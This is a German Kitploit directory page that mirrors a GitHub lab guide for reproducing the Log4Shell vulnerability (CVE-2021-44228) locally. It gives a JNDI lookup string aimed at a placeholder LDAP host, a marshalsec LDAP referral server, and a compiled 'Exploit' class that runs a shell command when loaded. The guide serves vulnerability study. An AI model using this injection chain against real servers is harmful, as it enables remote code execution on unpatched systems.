Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228 — Schritt-für-Schritt-Reproduktionsanleitung für CVE-2021-44228 (Log4Shell) mit JDK 8u20, anfälligem Log4j 2.14.1, marshalsec LDAP-Server und benutzerdefinierter Payload-Kompilierung. | Kitploit
Tools/GitHubGitHub/racoon-rac/cve-2021-44228
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubracoon-rac/cve-2021-44228

CVE-2021-44228

Schritt-für-Schritt-Reproduktionsanleitung für CVE-2021-44228 (Log4Shell) mit JDK 8u20, anfälligem Log4j 2.14.1, marshalsec LDAP-Server und benutzerdefinierter Payload-Kompilierung.

Repository anzeigen
5vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228

Ich denke, diese Geschichte ist praktischer (weint)christophetd/log4shell-vulnerable-app

Da ich nur aus Interesse und spontan recherchiert habe, gibt es wahrscheinlich unsichere Stellen oder Fehler.
Bitte machen Sie es auf eigene Verantwortung.

Reproduktionsumgebung einrichten.

Es sollte unter Linux funktionieren.

1. JDK herunterladen

Ab jdk8u191 wurde die Option com.sun.jndi.rmi.object.trustURLCodebase hinzugefügt, die standardmäßig auf False gesetzt ist. In diesem Zustand kann keine extern bereitgestellte Klasse geladen werden, daher verwenden wir hier eine frühere Version.
(Kann man interne Klassen laden oder umgehen??) https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Direkter Download von jdk8u20
Entpacken und in ein geeignetes Verzeichnis wie /opt legen.

2. Vorbereitung der anfälligen log4j-Version

Download von log4j
Entpacken und die Dateien log4j-api-2.14.1.jar und extrahieren (ich habe sie in ein Verzeichnis namens log4japp gelegt).

log4j-core-2.14.1.jar

3. Classpath für log4j setzen

root@kitploit:~
export CLASSPATH=:/path/to/log4japp/log4j-api-2.14.1.jar:/path/to/log4japp/log4j-core-2.14.1.jar

4. Einfache Anwendung erstellen

root@kitploit:~
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {


        private static final Logger logger = LogManager.getLogger(log4j.class);

        public static void main(String[] args) {
                logger.error("${jndi:ldap://your-ip:1389/resource}");
                // /resource がないと動きませんでした。
        }
}

5. Vorbereitung von marshalsec

mbechler/marshalsec
LDAP-Abfragen zur Webseite umleiten.

root@kitploit:~
mvn clean package -DskipTests

Listener starten

root@kitploit:~
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-web-ip:8888/#Exploit"

Auch das Ziel der Umleitung von marshalsec bereitstellen

root@kitploit:~
python3 -m http.server 8888

6. Klasse vorbereiten, die an marshalsec übergeben wird

root@kitploit:~
class Exploit {
    static {
        try { Runtime.getRuntime().exec("touch /tmp/evil"); } catch(Exception e) {}
    }
}

Mit dem installierten jdk8u20 kompilieren

root@kitploit:~
/opt/java/jdk1.8.0_20/bin/javac Exploit.java

7. Exploit

Mit dem installierten jdk8u20 kompilieren und ausführen.

root@kitploit:~
/opt/java/jdk1.8.0_20/bin/javac log4j.java
/opt/java/jdk1.8.0_20/bin/java log4j

screenshot

Tool herunterladen